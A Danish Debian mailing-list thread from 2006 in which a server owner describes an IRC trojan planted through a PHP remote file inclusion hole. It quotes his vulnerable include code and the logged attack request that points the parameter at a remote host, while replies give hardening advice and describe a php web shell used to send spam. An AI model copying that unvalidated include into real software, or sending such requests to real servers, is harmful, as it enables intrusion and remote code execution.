[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: SV: Trojan attack mod min server

Hvis nogen via en trojan får mulighed for at udføre kode på ens server kan det 
være meget, meget ubehageligt - også selvom de ikke er root. Jeg har haft 
lidt at gøre med en server der var blevet hakket så den sendte uendelige 
mængder spam (3 GB om dagen) - hvilket blev meget dyrt. De havde i øvrigt 
installeret en kommandoprompt skrevet i php så de kunne lave stort set hvad 
som helst. Der var netop ikke den type begrænsninger som Mads omtaler, så de 
havde temmelig frit spil som bruger: www-data. Dvs. de kunne gå ind på alle 
brugeres webhoteller og boltre sig og sprede alt muligt skidt.

Jeg havde heldigvis intet ansvar for sårbarhederne, men det har lært mig at 
man skal være meget, meget påpasselig med hvad man slipper ind af php på ens 
server. 

Flemming

Thursday 18 May 2006 07:10 skrev Mads N. Vestergaard:
> Hej Torben,
>
> Ikke så meget med dit spørgsmål, men hvis du ønsker at kunne inkludere en
> fil via en GET parameter, så sørg altid for at validere brugerens input.
> Gør f.eks. så de kun kan inkludere filer fra en bestemt mappe, samt at de
> skl have en bestemt endelse f.eks. .php, dvs, hvis brugeren havde sat
> reqfile til foo ville følgende fil blive inkluderet
> /sti/til/din/mappe/foo.php.
>
> Hvordan ville det ikke være hvis reqfile var sat til /etc/passwd
>
> I php.ini kan du også sætte at den ikke må åbne URLs.
>
> /Mads
>
> Torben Schou Jensen wrote:
> > Min index.php var kodet til at lave PHP include af den fil der angives i
> > reqfile:
> > if ($_REQUEST['reqfile']<>"") {
> >                include $_REQUEST['reqfile'];
> >                exit;
> > }
> >
> >
> > Mit gæt er at nogen via dette har kunne udføre noget kode i PHP fra
> > 291.133.46.212, normalt ville reqfile indeholde navnet på en fil på egen
> > min server, men nogen har været kreativ og fodret den med en http
> > adresse.
> >
> > GET /%7Etsj/fun/index.php?reqfile=http://219.133.46.212/admin/html/bar?
> >
> > Mvh
> > Torben
> >
> >> Efter at have læst på din side, er jeg ret nysgerrig I, hvad du har haft
> >> liggende I din index.php som har gjort, at han kunne downloade og
> >> eksekvere
> >> den fil der angives?
> >>
> >>
> >> Med venlig hilsen
> >> Andreas Krüger
> >>
> >> -----Oprindelig meddelelse-----
> >> Fra: Torben Schou Jensen [mailto:tsj@swampthing.dk]
> >> Sendt: 17. maj 2006 20:18
> >> Til: debian-user-danish@lists.debian.org
> >> Emne: Trojan attack mod min server
> >>
> >> Mandag aften opdager jeg tilfældigt via ntop en IP adresse der er fast
> >> koblet op på min server, og det er ikke HTTP trafik, men mystisk stabil
> >> trafik i små pakker mod port 2343.
> >>
> >> Ved nærmere undersøgelse viser det sig at være en såkaldt IRC trojan der
> >> i slutningen af december 2005 er sluppet ind på min server via et PHP
> >> hul og har bidt sig fast i crontab.
> >>
> >> Læs mere på http://swampthing.dk/attack1/
> >>
> >> PHP hullet er nu lukket og trojan er fjernet, men jeg tænker nu over
> >> hvad det hul kan have været brugt til, kan nemlig ikke finde ret meget
> >> info om sådan noget på google???
> >>
> >> Mvh
> >> Torben
> >>
> >>
> >>
> >> --
> >> To UNSUBSCRIBE, email to debian-user-danish-REQUEST@lists.debian.org
> >> with a subject of "unsubscribe". Trouble? Contact
> >> listmaster@lists.debian.org
Reply to: